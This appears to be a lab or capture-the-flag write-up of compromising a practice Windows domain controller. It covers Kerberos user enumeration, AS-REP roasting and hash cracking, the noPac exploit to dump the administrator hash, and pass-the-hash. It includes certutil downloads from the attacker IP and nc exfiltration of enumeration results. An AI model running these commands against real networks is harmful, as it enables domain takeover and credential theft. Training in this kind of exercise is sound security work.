After a period of regular privilege escalation attempts, I realized that I made a mistake, but it also made me more impressed and eager to try
Seriously, you'll find it fun
machine ip : 172.31.3.3
my ip : 10.10.0.82
port informations
Open 172.31.3.3:53Open 172.31.3.3:88Open 172.31.3.3:135Open 172.31.3.3:139Open 172.31.3.3:389Open 172.31.3.3:445Open 172.31.3.3:464Open 172.31.3.3:593Open 172.31.3.3:636Open 172.31.3.3:3389Open 172.31.3.3:5985Open 172.31.3.3:9389Open 172.31.3.3:47001Open 172.31.3.3:49664Open 172.31.3.3:49665Open 172.31.3.3:49666Open 172.31.3.3:49668Open 172.31.3.3:49671Open 172.31.3.3:49675Open 172.31.3.3:49674Open 172.31.3.3:49682Open 172.31.3.3:49699Open 172.31.3.3:49704
port 389 information
I FIND THE ldap port 389 is open,so i decide first to do thing is collect the ldap information
```
ldapsearch -x -s base namingcontexts -h 172.31.3.3
The DC.DOMAIN IS brute.csl
and then i need collect the username. or else DC information
port 445
enum4linux 172.31.3.3 -> we can find brute-DC and brute , add it to /etc/hosts , now we can use kerbrute to enum some exists user
./kerbrute userenum -d brute.csl /lab_test/windows_privilege/tryhard_cyber/brute/old/user --dc 172.31.3.3
we can found four users ,and i test AS-REP Ad vuln to bypass
impacket-GetNPUsers brute.csl/ -usersfile user -dc-ip 172.31.3.3 -format hashcat
we can get the user tess's hash, crack it
hashcat -m 18200 hash /usr/share/wordlists/rockyou.txt
try use impacket-GetUserSPNs and impacket-secretsdump but both fail
let's run smbmap and find something?
and nothing is youjiazhide.,but i can run evil-winrm to login tess account.
### Privilege to administrator way 1
Nopac -> CVE2021-42278
python3 noPac.py brute.csl/tess:Unique1 -dc-ip 172.31.3.3 --impersonate administrator -use-ldap -dump -just-dc-user administrator
evil-winrm -i 172.31.3.3 -u 'administrator' -H e2068a39ee8150b697797d6c3e513df7
### privilege to administrator way 2
### Privilege to
run bloodhound.exe and winpeasany.exe to find something.
certutil -urlcache -split -f http://10.10.0.82:82/SharpHound.exe
cmd.exe /c "winPEASany.exe > a.txt" # in lab machine
cmd.exe /c "nc.exe 10.10.0.82 9001 < a.txt" #in lab machine
nc -lvvp 9001 > peas.txt # in attack people machine
cmd.exe /c "SharpHound.exe -c all"
cmd.exe /c "nc.exe 10.10.0.82 9001 < 20220113052032_BloodHound.zip"
nc -lvvp 9001 > blod.zip
C:\Users\All Users\ntuser.pol
C:\Users\All Users\Amazon\EC2-Windows\Launch\Sysprep\Unattend.xml
https://sdmsoftware.com/security-related/understanding-group-policy-privilege-escalation-in-cve-2020-1317/
certutil -urlcache -split -f http://10.10.0.82:82/SharpGPOAbuse.exe
PASS THE HASH
impacket-getTGT brute.csl/administrator -hashes e2068a39ee8150b697797d6c3e513df7:e2068a39ee8150b697797d6c3e513df7
export KRB5CCNAME=./administrator_brute-dc.brute.csl.ccache
impacket-psexec brute.csl/administrator@brute-dc.brute.csl -k -no-pass
EmoticonEmoticon